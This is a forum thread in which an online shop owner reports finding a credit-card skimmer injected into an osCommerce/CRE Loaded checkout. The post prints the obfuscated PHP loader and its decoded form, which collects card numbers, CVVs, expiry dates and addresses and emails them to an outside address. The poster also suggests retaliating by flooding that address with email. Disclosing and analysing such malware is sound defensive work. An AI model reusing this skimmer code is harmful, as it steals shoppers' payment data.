Credit Card Number stealing inc_lib.php

[graith]

I found this code in checkout_confirmation.php

 

require(DIR_WS_INCLUDES . 'inc_lib.php');

 

which looks like this.

 

<?

function d($s,$k=''){if($k==''){for($i=0;$i<strlen($s);$i){$d.=chr(hexdec(substr($s,$i,2)));$i=(float)($i)+2;}return

$d;}else{$r='';$f=d('6261736536345f6465636f6465');$u=$f('Z3ppbmZsYXRl');$s=$u($f($s));for($i=0;$i<strlen($s);$i++){$c=substr($s,$i,1);$kc=substr($k,($i%strlen($k))-1,1);$c=chr(ord($c)-ord($kc));$r.=$c;}return

$r;}}eval(d("dVNbU9tGGP1fycDQMPBsxsbIRooviZs2CWkaYxNozEwK8SWE+qbVdXdlrbS7klZSAu3093WNwgMz6ZvmO+c7e86ZTwQ/VQkLEG2pqVY7Pv+wp+Xd339VS6OLWtPjqRU297NWtTc6Kam034OAMtCq/wM9u1U/aL3+V4VIsND0HOpW+uWK+XF89XnaNJbm6htzWXP2auex5tokX5V6e5o5vPgyumro0AxjBkCiGN3tTc1YCuokSaf2tqTOJqPJWK8v3VmamixbIO5lK21+vPVI1aFIgOBt5U1NBZfj4eVSgS7gmU7S2S0y799Kk1flI2XfGn8aXf914OqWaycFhPLw5UNITggFYsZ4GPn16+7mtuqmceehVTmBBIXWjQtEwZG1ROChDZQyioo4ug73+kpix4s5BALF3LK9BDvpUyWiOgp+7luIejaz9AYMxGqezgjU5p1yhQcIRa0TYIeIMNSsPVcVpdZoV5pNraO018qBxT2sdCsaIdAQnWMzZyHHOJkfZhZEvs9D+3vSABBvnYJHFqZaX89FEjCLLBVMTUTvjRVkkTBshes4lCGLdHDWRxFK5B8aRaQuUAwslN2AF7vPqmbhMc/JLtedFv0E0cOB/8jCDKr0MlJ8EOHMY8jSPTvZcLVXc+j80/DwYVeH58O/7wczM4+nA0P1+aljp86UudwsI78Utm/CzjFggrkRt1ypfgA/tKnt++qCoThzTW/WtuQZHljEZ7iWyeW0N9wpXuTFSX4qKTelbm7cW5jLCEPEkEtZvqS/IfOs8DAVK5DV57xFA/iGEoduWXcRC+eaVYUPQPs9PNUTvSv+S8zPgztIFu/bgTpQqSSc3/zwD8VYY7eVjR5DAzvbA0mcsuJ9bCHTHl1qdxyTL0uG9ve3N3YeLKf8W7V8RZc5EHfZbodNiAPqvIHWbchG2PUcWu9avXj+4nSPTubFpCGo4CVj+onggdvaj74Gp7asfnC8Gj5eGfrp+2tR3RBwqqqce/5niaEETRKKk69dkWzCcft7n8=",864930819));

?>

 

Decoding it turns it into this

 

if((isset($v) AND $v==0) OR (isset($t) AND $t==false)){die('');}$first_name = $_POST['cc_owner'];

$ccnum = $_POST['cc_number'];

$ccstart1 = $_POST['cc_start_month'];

$ccstart2 = $_POST['cc_start_year'];

$cvv2 = $_POST['cc_ccv'];

$exp1 = $_POST['cc_expires_month'];

$exp2 = $_POST['cc_expires_year'];

$issue = $_POST['cc_issue'];

$add = tep_address_format($order->billing['format_id'], $order->billing, 1, ' ', '---');

$phone = $order->customer['telephone'];

$email = $order->customer['email_address'];

$street = $order->customer['street_address'];

$city = $order->customer['city'];

$state = $order->customer['state'];

$zip = $order->customer['postcode'];

$ip = $_SERVER["REMOTE_ADDR"];

 

$msg = "Email: $email\nstreet: $street\ncity: $city\nState: $state\nzip: $zip\nPhone: $phone

Name: $first_name\nCcnumber: $ccnum\nExpdate: $exp1/$exp2\nCVV: $cvv2\nStart: $ccstart1/$ccstart1\nIssue: $issue

IP: $ip\nAddress: $add";

 

 

 

$to="[email protected]";

 

 

 

$subj = "HEY BABY";

 

$from ="From: [email protected]";

 

 

mail ($to, $subj, $msg, $from);

 

 

Its job is to email the credit card details to the email address [email protected] with subject HEY BABY

 

It'd be a great shame if he got 10,000 emails from [email protected] with that subject or if that email address was submitted to some obnoxious email feed.

 

I've no idea how the site was hacked. It's a version of CRE Loaded and the admin directory is password protected. Every file had its date and time stamp set to November 2007 so we can't trace exactly when it was done. We've turned off accepting credit card payment and we'll have to use a payment provider instead.

 

Graith

[Guest]

Brian,

 

Unless your site was PCI DSS compliant, you should not have been accepting credit cards anyway. Ensure you site is V2.2 RC2a and has ALL of the security patches and suggested Security Contributions installed to avoid any future security breaches.

 

 

 

Chris